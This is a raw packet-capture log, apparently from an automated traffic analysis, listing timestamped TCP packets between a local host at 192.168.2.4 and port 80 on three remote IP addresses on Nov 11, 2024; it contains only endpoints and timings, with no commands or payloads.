                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078231096 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078241110 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078252077 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078252077 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078264952 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078274012 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078274965 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078290939 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078296900 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078305006 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078318119 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078320980 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078329086 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078334093 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078351974 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078378916 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078553915 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078566074 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078592062 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078609943 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078757048 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078769922 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078780890 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078798056 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078798056 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078810930 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078821898 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078824043 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078835011 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078855038 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078866005 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078872919 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078881025 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078892946 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078900099 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078907013 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078917980 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078917980 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078932047 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078946114 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078949928 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078965902 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.078982115 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079190016 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079202890 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079215050 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079229116 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079238892 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079241991 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079256058 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079265118 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079268932 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079278946 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079281092 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079334021 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079336882 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079344988 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079348087 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079360962 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079371929 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079375982 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079382896 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079396009 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079407930 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079416037 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079430103 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079435110 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079444885 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079473972 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079653978 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079668999 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079680920 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079693079 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079694986 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079705000 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079711914 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079715967 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079731941 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079740047 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079744101 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079756021 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079762936 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079772949 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079785109 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079793930 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079809904 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.079837084 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.209928036 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.215025902 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.222842932 CET8049723217.20.57.34192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.223712921 CET4972380192.168.2.4217.20.57.34
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.223766088 CET4972380192.168.2.4217.20.57.34
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.228559971 CET8049723217.20.57.34192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410538912 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410607100 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410619020 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410629988 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410655022 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410657883 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410667896 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410680056 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410691977 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410692930 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410712957 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410716057 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410733938 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410737991 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410758018 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410784960 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410835981 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410849094 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410859108 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410871983 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410877943 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410885096 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410890102 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410898924 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410902977 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410923958 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.410944939 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411119938 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411132097 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411143064 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411154985 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411159039 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411168098 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411178112 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411183119 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411195993 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411204100 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411210060 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411221027 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411227942 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411243916 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411946058 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411957026 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411968946 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.411988020 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412018061 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412022114 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412035942 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412048101 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412058115 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412060976 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412071943 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412080050 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412086010 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412101030 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412195921 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412204027 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412216902 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412228107 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412240982 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412251949 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412252903 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412266970 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412276030 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412280083 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412288904 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412293911 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412317991 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412331104 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412353992 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412372112 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412506104 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412518978 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412529945 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412540913 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412545919 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412554026 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412564993 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412565947 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412580013 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412591934 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412597895 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412604094 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412616014 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412621021 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412628889 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412635088 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412648916 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412683964 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412834883 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412854910 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412868023 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412878036 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412889957 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412890911 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412904024 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412915945 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412919998 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412931919 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412934065 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412946939 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412957907 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412959099 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412966967 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412971020 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412982941 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412992954 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.412995100 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.413009882 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.413018942 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.413022041 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.413041115 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:18.413058996 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.039602041 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.039635897 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.044476986 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.044631958 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.740442991 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.740534067 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.786758900 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.791651964 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.996259928 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.996273041 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.996283054 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.996424913 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:19.998883009 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.003815889 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.200301886 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.201092005 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.220994949 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.225819111 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.919779062 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:20.919862986 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.075103045 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.080205917 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.277833939 CET8049753185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.277909040 CET4975380192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.299403906 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.304405928 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.304471016 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.304591894 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.310097933 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943154097 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943171978 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943240881 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943495989 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943541050 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943555117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943562984 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943627119 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943627119 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943634033 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943653107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943665028 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943677902 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943696022 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943701029 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943737030 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.943758011 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.948090076 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.948163033 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:21.948219061 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.056211948 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.056226969 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.056237936 CET8049762185.215.113.16192.168.2.4
